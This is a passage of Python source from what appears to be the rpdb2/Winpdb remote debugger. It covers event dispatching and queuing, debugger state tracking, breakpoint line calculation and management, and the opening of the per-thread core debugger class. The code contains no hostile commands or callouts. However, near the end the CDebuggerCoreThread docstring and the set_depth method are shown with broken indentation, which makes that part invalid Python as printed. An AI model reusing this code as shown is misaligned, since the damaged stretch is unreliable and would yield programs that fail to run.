            # A non-empty exclude list takes precedence over any include
            # list: fire unless one of the excluded values matches.
            return not any(event.is_match(e) for e in exclude_list)
        include_list = filters.get(EVENT_INCLUDE, [])
        if include_list:
            # Fire only if one of the included values matches.
            return any(event.is_match(e) for e in include_list)
        return True
class CEventDispatcher:
    """
    Events dispatcher.
    Dispatchers can be chained together.
    """
    def __init__(self, chained_event_dispatcher = None):
        self.m_chained_event_dispatcher = chained_event_dispatcher
        # Event types that must NOT be forwarded to the chained dispatcher.
        self.m_chain_override_types = {}
        # Maps record -> True, or record -> chained record (or False) when
        # a chained dispatcher exists.
        self.m_registrants = {}
    def shutdown(self):
        # Drop every registration, including mirrored chained ones.
        for record in list(self.m_registrants.keys()):
            self.__remove_dispatcher_record(record)
    def register_callback(self, callback, event_type_dict, fSingleUse):
        """
        Register callback for the given event types; returns the record.
        """
        record = CEventDispatcherRecord(callback, event_type_dict, fSingleUse)
        if self.m_chained_event_dispatcher is None:
            self.m_registrants[record] = True
            return record
        # Mirror the registration on the chained dispatcher and remember
        # the chained record so it can be removed later.
        chained_record = self.__register_callback_on_chain(record, event_type_dict, fSingleUse)
        self.m_registrants[record] = chained_record
        return record
    def remove_callback(self, callback):
        matches = [r for r in list(self.m_registrants.keys()) if r.m_callback == callback]
        for record in matches:
            self.__remove_dispatcher_record(record)
    def fire_events(self, event_list):
        for event in event_list:
            self.fire_event(event)
    def fire_event(self, event):
        # Iterate over a snapshot: callbacks may (un)register records.
        for record in list(self.m_registrants.keys()):
            self.__fire_er(event, record)
    def __fire_er(self, event, record):
        if not record.is_match(event):
            return
        try:
            record.m_callback(event)
        except:
            # A failing callback must never break event dispatching.
            pass
        if record.m_fSingleUse:
            # One-shot registration: discard after the first delivery.
            try:
                del self.m_registrants[record]
            except KeyError:
                pass
    def register_chain_override(self, event_type_dict):
        """
        Chain override prevents registration on chained
        dispatchers for specific event types.
        """
        for event_type in list(event_type_dict.keys()):
            self.m_chain_override_types[event_type] = True
    def __register_callback_on_chain(self, record, event_type_dict, fSingleUse):
        # Strip overridden event types before forwarding the registration.
        forwarded = copy.copy(event_type_dict)
        for event_type in self.m_chain_override_types:
            if event_type in forwarded:
                del forwarded[event_type]
        if len(forwarded) == 0:
            # Nothing left to forward.
            return False
        def callback(event, record = record):
            self.__fire_er(event, record)
        return self.m_chained_event_dispatcher.register_callback(callback, forwarded, fSingleUse)
    def __remove_dispatcher_record(self, record):
        try:
            if self.m_chained_event_dispatcher is not None:
                chained_record = self.m_registrants[record]
                if chained_record != False:
                    # Remove the mirrored registration from the chain first.
                    self.m_chained_event_dispatcher.__remove_dispatcher_record(chained_record)
            del self.m_registrants[record]
        except KeyError:
            pass
class CEventQueue:
    """
    Add queue semantics above an event dispatcher.
    Instead of firing event callbacks, new events are returned in a list
    upon request.
    """
    def __init__(self, event_dispatcher, max_event_list_length = MAX_EVENT_LIST_LENGTH):
        self.m_event_dispatcher = event_dispatcher
        # Condition variable that guards the queue state and is used to
        # wake threads blocked in wait_for_event().
        self.m_event_lock = threading.Condition()
        # Oldest events are discarded once the list grows past this bound.
        self.m_max_event_list_length = max_event_list_length
        self.m_event_list = []
        # Monotonically increasing count of all events ever queued; clients
        # pass their last-seen index to wait_for_event() to get only newer
        # events.
        self.m_event_index = 0
        # One entry per thread currently blocked in wait_for_event().
        self.m_n_waiters = []
    def shutdown(self):
        # Detach from the dispatcher; no further events will be queued.
        self.m_event_dispatcher.remove_callback(self.event_handler)
    def register_event_types(self, event_type_dict):
        # Subscribe event_handler() for the given event types.
        self.m_event_dispatcher.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
    def event_handler(self, event):
        # Dispatcher callback: append the event and wake all waiters.
        try:
            self.m_event_lock.acquire()
            if isinstance(event, CEventSyncReceivers):
                # Sync events must be picked up by all listeners at once:
                # stall until enough threads are blocked in wait_for_event()
                # or the heartbeat timeout expires.
                t0 = time.time()
                while len(self.m_n_waiters) < event.m_sync_n and time.time() < t0 + HEARTBEAT_TIMEOUT:
                    time.sleep(0.1)
            self.m_event_list.append(event)
            if len(self.m_event_list) > self.m_max_event_list_length:
                # Respect the length bound by dropping the oldest event.
                self.m_event_list.pop(0)
            self.m_event_index += 1
            lock_notify_all(self.m_event_lock)
        finally:
            self.m_event_lock.release()
    def get_event_index(self):
        # Index of the newest queued event.
        return self.m_event_index
    def wait_for_event(self, timeout, event_index):
        """
        Return the new events which were fired.
        Returns (latest_index, events newer than event_index); blocks up to
        timeout if no new events are available yet.
        """
        try:
            self.m_n_waiters.append(0)
            self.m_event_lock.acquire()
            if event_index >= self.m_event_index:
                safe_wait(self.m_event_lock, timeout)
            if event_index >= self.m_event_index:
                return (self.m_event_index, [])
            # Negative slice start: take the trailing events the caller has
            # not yet seen (bounded by what is still in the list).
            sub_event_list = self.m_event_list[event_index - self.m_event_index:]
            return (self.m_event_index, sub_event_list)
        finally:
            self.m_n_waiters.pop()
            self.m_event_lock.release()
class CStateManager:
    """
    Manage possible debugger states (broken, running, etc...)
    The state manager can receive state changes via an input event
    dispatcher or via the set_state() method
    It sends state changes forward to the output event dispatcher.
    The state can also be queried or waited for.
    """
    def __init__(self, initial_state, event_dispatcher_output = None, event_dispatcher_input = None):
        self.m_event_dispatcher_input = event_dispatcher_input
        self.m_event_dispatcher_output = event_dispatcher_output
        if self.m_event_dispatcher_input is not None:
            # Receive state events from the input dispatcher.
            event_type_dict = {CEventState: {}}
            self.m_event_dispatcher_input.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
            if self.m_event_dispatcher_output is not None:
                # Prevent CEventState from propagating automatically along
                # the chain; this manager re-fires it itself in set_state().
                self.m_event_dispatcher_output.register_chain_override(event_type_dict)
        # Condition guarding the state queue and waiter bookkeeping.
        self.m_state_lock = threading.Condition()
        self.m_state_queue = []
        self.m_state_index = 0
        # Maps state index -> number of waiters that entered at that index.
        self.m_waiter_list = {}
        self.set_state(initial_state)
    def shutdown(self):
        if self.m_event_dispatcher_input is not None:
            self.m_event_dispatcher_input.remove_callback(self.event_handler)
    def event_handler(self, event):
        # Input-dispatcher callback: adopt the announced state.
        self.set_state(event.m_state)
    def get_state(self):
        # The newest state is the current state.
        return self.m_state_queue[-1]
    def __add_state(self, state):
        self.m_state_queue.append(state)
        self.m_state_index += 1
        # Trim states no waiter can still be interested in.
        self.__remove_states()
    def __remove_states(self, treshold = None):
        """
        Clean up old state changes from the state queue.
        """
        index = self.__calc_min_index()
        if (treshold is not None) and (index <= treshold):
            # A waiter older than (or at) the threshold still exists;
            # nothing can be trimmed yet.
            return
        _delta = 1 + self.m_state_index - index
        self.m_state_queue = self.m_state_queue[-_delta:]
    def __calc_min_index(self):
        """
        Calc the minimum state index.
        The calculated index is the oldest state of which all state
        waiters are aware of. That is, no one cares for older states
        and these can be removed from the state queue.
        """
        if len(self.m_waiter_list) == 0:
            return self.m_state_index
        index_list = list(self.m_waiter_list.keys())
        min_index = min(index_list)
        return min_index
    def __add_waiter(self):
        # Record a waiter entering at the current state index.
        index = self.m_state_index
        n = self.m_waiter_list.get(index, 0)
        self.m_waiter_list[index] = n + 1
        return index
    def __remove_waiter(self, index):
        # Undo __add_waiter(); trim the queue when the last waiter at
        # this index leaves.
        n = self.m_waiter_list[index]
        if n == 1:
            del self.m_waiter_list[index]
            self.__remove_states(index)
        else:
            self.m_waiter_list[index] = n - 1
    def __get_states(self, index):
        # All states recorded since 'index', inclusive of the current one.
        _delta = 1 + self.m_state_index - index
        states = self.m_state_queue[-_delta:]
        return states
    def set_state(self, state = None, fLock = True):
        """
        Record a new state (None repeats the current state) and notify
        waiters; forwards a CEventState on the output dispatcher.
        """
        try:
            if fLock:
                self.m_state_lock.acquire()
            if state is None:
                state = self.get_state()
            self.__add_state(state)
            lock_notify_all(self.m_state_lock)
        finally:
            if fLock:
                self.m_state_lock.release()
        # Fire outside the lock to avoid re-entrancy while holding it.
        if self.m_event_dispatcher_output is not None:
            event = CEventState(state)
            self.m_event_dispatcher_output.fire_event(event)
    def wait_for_state(self, state_list):
        """
        Wait for any of the states in the state list.
        """
        try:
            self.m_state_lock.acquire()
            if self.get_state() in state_list:
                return self.get_state()
            while True:
                # Register as a waiter so intermediate states are retained
                # for us even if further changes occur while we sleep.
                index = self.__add_waiter()
                alertable_wait(self.m_state_lock, PING_TIMEOUT)
                states = self.__get_states(index)
                self.__remove_waiter(index)
                for state in states:
                    if state in state_list:
                        return state
        finally:
            self.m_state_lock.release()
    def acquire(self):
        self.m_state_lock.acquire()
    def release(self):
        self.m_state_lock.release()
#
# -------------------------------------- Break Info manager ---------------------------------------
#
def myord(c):
    """
    Return ord(c) for a one-character string; return c unchanged when it
    is already an int.
    Compatibility shim: iterating a co_lnotab yields str in Python 2 but
    int in Python 3, so bytes may arrive as either type.
    """
    try:
        return ord(c)
    except TypeError:
        # Narrowed from a bare 'except:' — ord() raises TypeError for
        # non-string input (the int case); anything else should propagate.
        return c
def CalcValidLines(code):
    """
    Return the list of line numbers of 'code' on which a breakpoint can
    be placed, derived from the code object's co_lnotab line table.
    """
    lineno = code.co_firstlineno
    valid = [lineno]
    # Pair each line increment with the byte increment of the *next*
    # lnotab entry ([2::2] vs [1::2]), so a line is only recorded where
    # bytecode is actually emitted for it.
    byte_incrs = [myord(c) for c in code.co_lnotab[2::2]]
    line_incrs = [myord(c) for c in code.co_lnotab[1::2]]
    for byte_incr, line_incr in zip(byte_incrs, line_incrs):
        lineno += line_incr
        if byte_incr == 0:
            continue
        if lineno != valid[-1]:
            valid.append(lineno)
    # The final line increment has no following byte increment; apply it
    # separately.
    if len(line_incrs) > 0:
        lineno += line_incrs[-1]
        if lineno != valid[-1]:
            valid.append(lineno)
    return valid
class CScopeBreakInfo:
    """
    Valid breakpoint lines of a single scope (module, class or function),
    identified by its fully qualified name.
    """
    def __init__(self, fqn, valid_lines):
        self.m_fqn = fqn
        self.m_first_line = valid_lines[0]
        self.m_last_line = valid_lines[-1]
        self.m_valid_lines = valid_lines
    def CalcScopeLine(self, lineno):
        """
        Return the closest valid line at or below lineno; falls back to
        the scope's first valid line when lineno precedes them all.
        """
        for candidate in reversed(self.m_valid_lines):
            if lineno >= candidate:
                break
        return candidate
    def __str__(self):
        return "('%s', %s)" % (self.m_fqn, self.m_valid_lines)
class CFileBreakInfo:
    """
    Break info structure for a source file.
    Holds one CScopeBreakInfo per scope (module, class, function) defined
    in the file.
    """
    def __init__(self, filename):
        self.m_filename = filename
        self.m_first_line = 0
        self.m_last_line = 0
        self.m_scope_break_info = []
    def CalcBreakInfo(self):
        """
        Compile the source file and walk its code objects, computing the
        valid breakpoint lines of every scope.
        """
        (source, encoding) = get_source(self.m_filename)
        _source = as_string(source + as_unicode('\n'), encoding)
        code = compile(_source, self.m_filename, "exec")
        self.m_scope_break_info = []
        self.m_first_line = code.co_firstlineno
        self.m_last_line = 0
        # fqn is a stack of scope names leading to the current scope.
        fqn = []
        t = [code]
        while len(t) > 0:
            c = t.pop(0)
            if type(c) == tuple:
                # Sentinel tuple: all sub-scopes of this scope have been
                # processed; record the scope and pop its name.
                self.m_scope_break_info.append(CScopeBreakInfo(*c))
                fqn.pop()
                continue
            fqn = fqn + [c.co_name]
            valid_lines = CalcValidLines(c)
            self.m_last_line = max(self.m_last_line, valid_lines[-1])
            _fqn = as_unicode('.'.join(fqn), encoding)
            si = (_fqn, valid_lines)
            # Process nested code objects first; the (fqn, lines) tuple
            # acts as a sentinel marking where this scope ends.
            subcodeslist = self.__CalcSubCodesList(c)
            t = subcodeslist + [si] + t
    def __CalcSubCodesList(self, code):
        # Return the code objects nested in 'code', ordered by line number.
        tc = type(code)
        t = [(c.co_firstlineno, c) for c in code.co_consts if type(c) == tc]
        t.sort()
        scl = [c[1] for c in t]
        return scl
    def FindScopeByLineno(self, lineno):
        """
        Find the scope holding lineno and its closest valid breakpoint
        line. Returns (CScopeBreakInfo, line).
        """
        # Clamp lineno into the file's known line range.
        lineno = max(min(lineno, self.m_last_line), self.m_first_line)
        smaller_element = None
        exact_element = None
        for sbi in self.m_scope_break_info:
            if lineno > sbi.m_last_line:
                # Track the scope that ends closest before lineno.
                if (smaller_element is None) or (sbi.m_last_line >= smaller_element.m_last_line):
                    smaller_element = sbi
                continue
            if (lineno >= sbi.m_first_line) and (lineno <= sbi.m_last_line):
                exact_element = sbi
                break
        assert(exact_element is not None)
        scope = exact_element
        l = exact_element.CalcScopeLine(lineno)
        if (smaller_element is not None) and (l <= smaller_element.m_last_line):
            # A preceding scope ends closer to lineno than the exact
            # scope's chosen valid line; prefer that scope.
            scope = smaller_element
            l = smaller_element.CalcScopeLine(lineno)
        return (scope, l)
    def FindScopeByName(self, name, offset):
        """
        Find a scope by fully qualified name and return the valid line at
        'offset' from its first line. Returns (CScopeBreakInfo, line);
        raises InvalidScopeName when no scope matches.
        """
        if name.startswith(MODULE_SCOPE):
            alt_scope = MODULE_SCOPE2 + name[len(MODULE_SCOPE):]
        elif name.startswith(MODULE_SCOPE2):
            alt_scope = MODULE_SCOPE + name[len(MODULE_SCOPE2):]
        else:
            # Relative name: qualify with the module scope and retry.
            return self.FindScopeByName(MODULE_SCOPE2 + SCOPE_SEP + name, offset)
        for sbi in self.m_scope_break_info:
            if sbi.m_fqn in [name, alt_scope]:
                l = sbi.CalcScopeLine(sbi.m_first_line + offset)
                return (sbi, l)
        print_debug('Invalid scope: %s' % repr(name))
        raise InvalidScopeName
class CBreakInfoManager:
    """
    Manage break info dictionary per filename.
    Break info is computed lazily and cached on first request.
    """
    def __init__(self):
        self.m_file_info_dic = {}
    def addFile(self, filename):
        # Compute and cache break info for a file.
        info = CFileBreakInfo(filename)
        info.CalcBreakInfo()
        self.m_file_info_dic[filename] = info
    def getFile(self, filename):
        if filename not in self.m_file_info_dic:
            self.addFile(filename)
        return self.m_file_info_dic[filename]
#
# -------------------------------- Break Point Manager -----------------------------
#
def breakpoint_copy(bp):
    """
    Return a shallow copy of breakpoint bp suitable for serialization:
    the filename is normalized to unicode and the compiled condition
    code object (which cannot be pickled) is dropped.
    Returns None when bp is None.
    """
    if bp is None:
        return None
    duplicate = copy.copy(bp)
    duplicate.m_filename = as_unicode(bp.m_filename, sys.getfilesystemencoding())
    duplicate.m_code = None
    return duplicate
class CBreakPoint(object):
    def __init__(self, filename, scope_fqn, scope_first_line, lineno, fEnabled, expr, encoding, fTemporary = False):
        """
        Breakpoint constructor.
        scope_fqn - scope fully qualified name. e.g: module.class.method
        expr - optional conditional expression; compiled eagerly so it can
        be evaluated cheaply at trace time.
        """
        self.m_id = None
        self.m_fEnabled = fEnabled
        self.m_filename = filename
        self.m_scope_fqn = scope_fqn
        self.m_scope_name = scope_fqn.split(SCOPE_SEP)[-1]
        self.m_scope_first_line = scope_first_line
        # Offset of the breakpoint line relative to its scope's first line.
        self.m_scope_offset = lineno - scope_first_line
        self.m_lineno = lineno
        self.m_expr = expr
        self.m_encoding = encoding
        self.m_code = None
        self.m_fTemporary = fTemporary
        if expr not in (None, ''):
            # Prefix an encoding declaration so the expression source is
            # decoded correctly, then pre-compile it.
            _expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding)
            print_debug('Breakpoint expression: %s' % repr(_expr))
            self.m_code = compile(_expr, '<string>', 'eval')
    def __reduce__(self):
        # Pickle by recreating the instance and restoring its attributes.
        return (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
    def calc_enclosing_scope_name(self):
        """
        When this breakpoint sits on its scope's first line, return the
        name of the enclosing scope; otherwise return None.
        """
        if self.m_scope_offset != 0:
            return None
        if self.m_scope_fqn in (MODULE_SCOPE, MODULE_SCOPE2):
            return None
        return self.m_scope_fqn.split(SCOPE_SEP)[-2]
    def enable(self):
        self.m_fEnabled = True
    def disable(self):
        self.m_fEnabled = False
    def isEnabled(self):
        return self.m_fEnabled
    def __str__(self):
        return "('%s', '%s', %s, %s, %s)" % (self.m_filename, self.m_scope_fqn, self.m_scope_first_line, self.m_scope_offset, self.m_lineno)
class CBreakPointsManagerProxy:
    """
    A proxy for the breakpoint manager.
    While the breakpoint manager resides on the debuggee (the server),
    the proxy resides in the debugger (the client - session manager).
    Mirrors the breakpoint tables, indexed by id and by (filename, line).
    """
    def __init__(self, session_manager):
        self.m_session_manager = session_manager
        self.m_break_points_by_file = {}
        self.m_break_points_by_id = {}
        self.m_lock = threading.Lock()
        #
        # The breakpoint proxy inserts itself between the two chained
        # event dispatchers in the session manager.
        #
        event_type_dict = {CEventBreakpoint: {}}
        self.m_session_manager.m_event_dispatcher_proxy.register_callback(self.update_bp, event_type_dict, fSingleUse = False)
        self.m_session_manager.m_event_dispatcher.register_chain_override(event_type_dict)
    def update_bp(self, event):
        """
        Handle breakpoint updates that arrive via the event dispatcher.
        """
        try:
            self.m_lock.acquire()
            if event.m_fAll:
                id_list = list(self.m_break_points_by_id.keys())
            else:
                id_list = event.m_id_list
            if event.m_action == CEventBreakpoint.REMOVE:
                for id in id_list:
                    try:
                        bp = self.m_break_points_by_id.pop(id)
                        bpm = self.m_break_points_by_file[bp.m_filename]
                        del bpm[bp.m_lineno]
                        if len(bpm) == 0:
                            # Drop the per-file map once it is empty.
                            del self.m_break_points_by_file[bp.m_filename]
                    except KeyError:
                        pass
                return
            if event.m_action == CEventBreakpoint.DISABLE:
                for id in id_list:
                    try:
                        bp = self.m_break_points_by_id[id]
                        bp.disable()
                    except KeyError:
                        pass
                return
            if event.m_action == CEventBreakpoint.ENABLE:
                for id in id_list:
                    try:
                        bp = self.m_break_points_by_id[id]
                        bp.enable()
                    except KeyError:
                        pass
                return
            # CEventBreakpoint.SET: insert or replace the breakpoint.
            # BUGFIX: was .get(filename, {}), which discarded the fresh
            # dict for a previously unseen filename, so the breakpoint was
            # never indexed by file. setdefault matches CBreakPointsManager.
            bpm = self.m_break_points_by_file.setdefault(event.m_bp.m_filename, {})
            bpm[event.m_bp.m_lineno] = event.m_bp
            self.m_break_points_by_id[event.m_bp.m_id] = event.m_bp
        finally:
            self.m_lock.release()
        # Forward the event down the dispatcher chain, outside the lock.
        self.m_session_manager.m_event_dispatcher.fire_event(event)
    def sync(self):
        """
        Re-fetch the complete breakpoint table from the debuggee and
        rebuild both local indexes.
        """
        try:
            self.m_lock.acquire()
            self.m_break_points_by_file = {}
            self.m_break_points_by_id = {}
        finally:
            self.m_lock.release()
        # Query the debuggee outside the lock (potential network round-trip).
        break_points_by_id = self.m_session_manager.getSession().getProxy().get_breakpoints()
        try:
            self.m_lock.acquire()
            self.m_break_points_by_id.update(break_points_by_id)
            for bp in list(self.m_break_points_by_id.values()):
                # BUGFIX: was .get(filename, {}) — since the by-file table
                # was just cleared, every filename is new and the fresh
                # dicts were thrown away, leaving m_break_points_by_file
                # permanently empty after a sync.
                bpm = self.m_break_points_by_file.setdefault(bp.m_filename, {})
                bpm[bp.m_lineno] = bp
        finally:
            self.m_lock.release()
    def clear(self):
        # Forget all mirrored breakpoints.
        try:
            self.m_lock.acquire()
            self.m_break_points_by_file = {}
            self.m_break_points_by_id = {}
        finally:
            self.m_lock.release()
    def get_breakpoints(self):
        return self.m_break_points_by_id
    def get_breakpoint(self, filename, lineno):
        """
        Return the breakpoint at (filename, lineno); raises KeyError when
        none is set there.
        """
        bpm = self.m_break_points_by_file[filename]
        bp = bpm[lineno]
        return bp
class CBreakPointsManager:
    """
    Debuggee-side breakpoint manager.
    Indexes breakpoints by id, by file and by scope (function) name, and
    maintains the per-file table of active (enabled) breakpoints that the
    tracing code consults on every line event.
    """
    def __init__(self):
        self.m_break_info_manager = CBreakInfoManager()
        self.m_active_break_points_by_file = {}
        self.m_break_points_by_function = {}
        self.m_break_points_by_file = {}
        self.m_break_points_by_id = {}
        self.m_lock = threading.Lock()
        # Single temporary breakpoint used for run-to-line.
        self.m_temp_bp = None
        # A "hard" temporary breakpoint is removed only when actually hit.
        self.m_fhard_tbp = False
    def get_active_break_points_by_file(self, filename):
        """
        Get active breakpoints for file.
        """
        _filename = winlower(filename)
        # setdefault: hand out a dict that stays live; it is updated in
        # place by __calc_active_break_points_by_file().
        return self.m_active_break_points_by_file.setdefault(_filename, {})
    def __calc_active_break_points_by_file(self, filename):
        # Rebuild a file's active table (enabled + temporary breakpoints)
        # in place so dicts handed out earlier remain current.
        bpmpt = self.m_active_break_points_by_file.setdefault(filename, {})
        bpmpt.clear()
        bpm = self.m_break_points_by_file.get(filename, {})
        for bp in list(bpm.values()):
            if bp.m_fEnabled:
                bpmpt[bp.m_lineno] = bp
        tbp = self.m_temp_bp
        if (tbp is not None) and (tbp.m_filename == filename):
            bpmpt[tbp.m_lineno] = tbp
    def __remove_from_function_list(self, bp):
        # Unindex bp from the scope name(s) it belongs to.
        function_name = bp.m_scope_name
        try:
            bpf = self.m_break_points_by_function[function_name]
            del bpf[bp]
            if len(bpf) == 0:
                del self.m_break_points_by_function[function_name]
        except KeyError:
            pass
        #
        # In some cases a breakpoint belongs to two scopes at the
        # same time. For example a breakpoint on the declaration line
        # of a function.
        #
        _function_name = bp.calc_enclosing_scope_name()
        if _function_name is None:
            return
        try:
            _bpf = self.m_break_points_by_function[_function_name]
            del _bpf[bp]
            if len(_bpf) == 0:
                del self.m_break_points_by_function[_function_name]
        except KeyError:
            pass
    def __add_to_function_list(self, bp):
        # Index bp by the scope name(s) it belongs to.
        function_name = bp.m_scope_name
        bpf = self.m_break_points_by_function.setdefault(function_name, {})
        bpf[bp] = True
        #
        # In some cases a breakpoint belongs to two scopes at the
        # same time. For example a breakpoint on the declaration line
        # of a function.
        #
        _function_name = bp.calc_enclosing_scope_name()
        if _function_name is None:
            return
        _bpf = self.m_break_points_by_function.setdefault(_function_name, {})
        _bpf[bp] = True
    def get_breakpoint(self, filename, lineno):
        """
        Get breakpoint by file and line number.
        Raises KeyError when no breakpoint is set there.
        """
        bpm = self.m_break_points_by_file[filename]
        bp = bpm[lineno]
        return bp
    def del_temp_breakpoint(self, fLock = True, breakpoint = None):
        """
        Delete a temporary breakpoint.
        A temporary breakpoint is used when the debugger is asked to
        run-to a particular line.
        Hard temporary breakpoints are deleted only when actually hit.
        """
        if self.m_temp_bp is None:
            return
        try:
            if fLock:
                self.m_lock.acquire()
            # Re-check under the lock.
            if self.m_temp_bp is None:
                return
            if self.m_fhard_tbp and not breakpoint is self.m_temp_bp:
                # A hard temp breakpoint survives unless it was the one hit.
                return
            bp = self.m_temp_bp
            self.m_temp_bp = None
            self.m_fhard_tbp = False
            self.__remove_from_function_list(bp)
            self.__calc_active_break_points_by_file(bp.m_filename)
        finally:
            if fLock:
                self.m_lock.release()
    def set_temp_breakpoint(self, filename, scope, lineno, fhard = False):
        """
        Set a temporary breakpoint.
        A temporary breakpoint is used when the debugger is asked to
        run-to a particular line.
        Hard temporary breakpoints are deleted only when actually hit.
        """
        _filename = winlower(filename)
        mbi = self.m_break_info_manager.getFile(_filename)
        if scope != '':
            (s, l) = mbi.FindScopeByName(scope, lineno)
        else:
            (s, l) = mbi.FindScopeByLineno(lineno)
        bp = CBreakPoint(_filename, s.m_fqn, s.m_first_line, l, fEnabled = True, expr = as_unicode(''), encoding = as_unicode('utf-8'), fTemporary = True)
        try:
            self.m_lock.acquire()
            # Force removal of any existing temp breakpoint, hard or not.
            self.m_fhard_tbp = False
            self.del_temp_breakpoint(fLock = False)
            self.m_fhard_tbp = fhard
            self.m_temp_bp = bp
            self.__add_to_function_list(bp)
            self.__calc_active_break_points_by_file(bp.m_filename)
        finally:
            self.m_lock.release()
    def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, encoding):
        """
        Set breakpoint.
        scope - a string (possibly empty) with the dotted scope of the
        breakpoint. eg. 'my_module.my_class.foo'
        expr - a string (possibly empty) with a python expression
        that will be evaluated at the scope of the breakpoint.
        The breakpoint will be hit if the expression evaluates
        to True.
        Returns the new CBreakPoint.
        """
        _filename = winlower(filename)
        mbi = self.m_break_info_manager.getFile(_filename)
        if scope != '':
            (s, l) = mbi.FindScopeByName(scope, lineno)
        else:
            (s, l) = mbi.FindScopeByLineno(lineno)
        bp = CBreakPoint(_filename, s.m_fqn, s.m_first_line, l, fEnabled, expr, encoding)
        try:
            self.m_lock.acquire()
            bpm = self.m_break_points_by_file.setdefault(_filename, {})
            #
            # If a breakpoint on the same line is found we use its ID.
            # Since the debugger lists breakpoints by IDs, this has
            # a similar effect to modifying the breakpoint.
            #
            try:
                old_bp = bpm[l]
                id = old_bp.m_id
                self.__remove_from_function_list(old_bp)
            except KeyError:
                #
                # Find the smallest available ID.
                #
                bpids = list(self.m_break_points_by_id.keys())
                bpids.sort()
                id = 0
                while id < len(bpids):
                    if bpids[id] != id:
                        break
                    id += 1
            bp.m_id = id
            self.m_break_points_by_id[id] = bp
            bpm[l] = bp
            if fEnabled:
                self.__add_to_function_list(bp)
            self.__calc_active_break_points_by_file(bp.m_filename)
            return bp
        finally:
            self.m_lock.release()
    def disable_breakpoint(self, id_list, fAll):
        """
        Disable breakpoint.
        id_list lists the breakpoint ids to disable; fAll disables all.
        """
        try:
            self.m_lock.acquire()
            if fAll:
                id_list = list(self.m_break_points_by_id.keys())
            for id in id_list:
                try:
                    bp = self.m_break_points_by_id[id]
                except KeyError:
                    continue
                bp.disable()
                # A disabled breakpoint is removed from the scope index so
                # tracing skips its function entirely.
                self.__remove_from_function_list(bp)
                self.__calc_active_break_points_by_file(bp.m_filename)
        finally:
            self.m_lock.release()
    def enable_breakpoint(self, id_list, fAll):
        """
        Enable breakpoint.
        id_list lists the breakpoint ids to enable; fAll enables all.
        """
        try:
            self.m_lock.acquire()
            if fAll:
                id_list = list(self.m_break_points_by_id.keys())
            for id in id_list:
                try:
                    bp = self.m_break_points_by_id[id]
                except KeyError:
                    continue
                bp.enable()
                self.__add_to_function_list(bp)
                self.__calc_active_break_points_by_file(bp.m_filename)
        finally:
            self.m_lock.release()
    def delete_breakpoint(self, id_list, fAll):
        """
        Delete breakpoint.
        id_list lists the breakpoint ids to delete; fAll deletes all.
        """
        try:
            self.m_lock.acquire()
            if fAll:
                id_list = list(self.m_break_points_by_id.keys())
            for id in id_list:
                try:
                    bp = self.m_break_points_by_id[id]
                except KeyError:
                    continue
                filename = bp.m_filename
                lineno = bp.m_lineno
                bpm = self.m_break_points_by_file[filename]
                if bp == bpm[lineno]:
                    del bpm[lineno]
                if len(bpm) == 0:
                    del self.m_break_points_by_file[filename]
                self.__remove_from_function_list(bp)
                self.__calc_active_break_points_by_file(bp.m_filename)
                del self.m_break_points_by_id[id]
        finally:
            self.m_lock.release()
    def get_breakpoints(self):
        return self.m_break_points_by_id
#
# ----------------------------------- Core Debugger ------------------------------------
#
class CCodeContext:
    """
    Class represents info related to code objects: the code object, its
    resolved path and basename, the file's active breakpoints, and the
    exception-trap flag.
    """
    def __init__(self, frame, bp_manager):
        self.m_code = frame.f_code
        self.m_filename = calc_frame_path(frame)
        self.m_basename = os.path.basename(self.m_filename)
        # Live dict of active breakpoints for this file.
        self.m_file_breakpoints = bp_manager.get_active_break_points_by_file(self.m_filename)
        self.m_fExceptionTrap = False
    def is_untraced(self):
        """
        Return True if this code object should not be traced.
        """
        return self.m_basename in (THREADING_FILENAME, DEBUGGER_FILENAME)
    def is_exception_trap_frame(self):
        """
        Return True if this frame should be a trap for unhandled
        exceptions.
        """
        if self.m_basename == THREADING_FILENAME:
            return True
        is_debugger_file = self.m_basename == DEBUGGER_FILENAME
        return is_debugger_file and self.m_code.co_name in ('__execv', '__execve', '__function_wrapper')
class CDebuggerCoreThread:
"""
Class represents a debugged thread.
This is a core structure of the debugger. It includes most of the
optimization tricks and hacks, and includes a good amount of
    subtle bug fixes, be careful not to mess it up...
"""
    def __init__(self, name, core_debugger, frame, event):
        """
        Per-thread debugger state for the calling thread.
        name - thread name; frame - current frame; event - current trace
        event; core_debugger - owning core debugger instance.
        """
        self.m_thread_id = thread.get_ident()
        self.m_thread_name = name
        # Break status flag.
        self.m_fBroken = False
        self.m_fUnhandledException = False
        self.m_frame = frame
        self.m_event = event
        # Line numbers recorded when reporting an unhandled exception.
        self.m_ue_lineno = None
        self.m_uef_lineno = None
        self.m_code_context = core_debugger.get_code_context(frame)
        # Per-frame (locals_copy, original_copy) pairs; see get_locals_copy().
        self.m_locals_copy = {}
        self.m_core = core_debugger
        self.m_bp_manager = core_debugger.m_bp_manager
        # Guards external references to m_frame (frame_acquire/frame_release).
        self.m_frame_lock = threading.Condition()
        self.m_frame_external_references = 0
        self.m_exc_info = None
        self.m_depth = 0
        self.set_depth(frame)
def set_depth(self, frame):
self.m_depth = 0
while frame is not None:
self.m_depth += 1
frame = frame.f_back
    def profile_recursion(self, frame, event, arg):
        """
        Profile callback installed while guarding against runaway
        recursion: raises RuntimeError on a 'call' past the limit and
        delegates 'return' events to the normal profile handler.
        """
        if event == 'call':
            if self.m_depth > g_recursionlimit:
                print_debug('Exceeded recursion limit and caught in profile function.')
                try:
                    #
                    # The allowed recursion limit was exceeded.
                    # To view the offending script frame, go two frames
                    # down the stack with the 'down' console command.
                    #
                    raise RuntimeError('maximum recursion depth exceeded')
                except:
                    #
                    # Schedule the debugger to re-enable the profile hook.
                    #
                    self.set_tracers(fsignal_exception = True)
                    raise
        elif event == 'return':
            return self.profile(frame, event, arg)
    def profile(self, frame, event, arg):
        """
        Profiler method.
        The Python profiling mechanism is used by the debugger
        mainly to handle synchronization issues related to the
        life time of the frame structure.
        """
        #print_debug('profile: %s, %s, %s, %s, %s' % (repr(frame), event, frame.f_code.co_name, frame.f_code.co_filename, repr(arg)[:40]))
        if event == 'return':
            self.m_depth -= 1
            if sys.excepthook != g_excepthook:
                # Restore the debugger's excepthook if user code replaced it.
                set_excepthook()
            self.m_frame = frame.f_back
            try:
                self.m_code_context = self.m_core.m_code_contexts[self.m_frame.f_code]
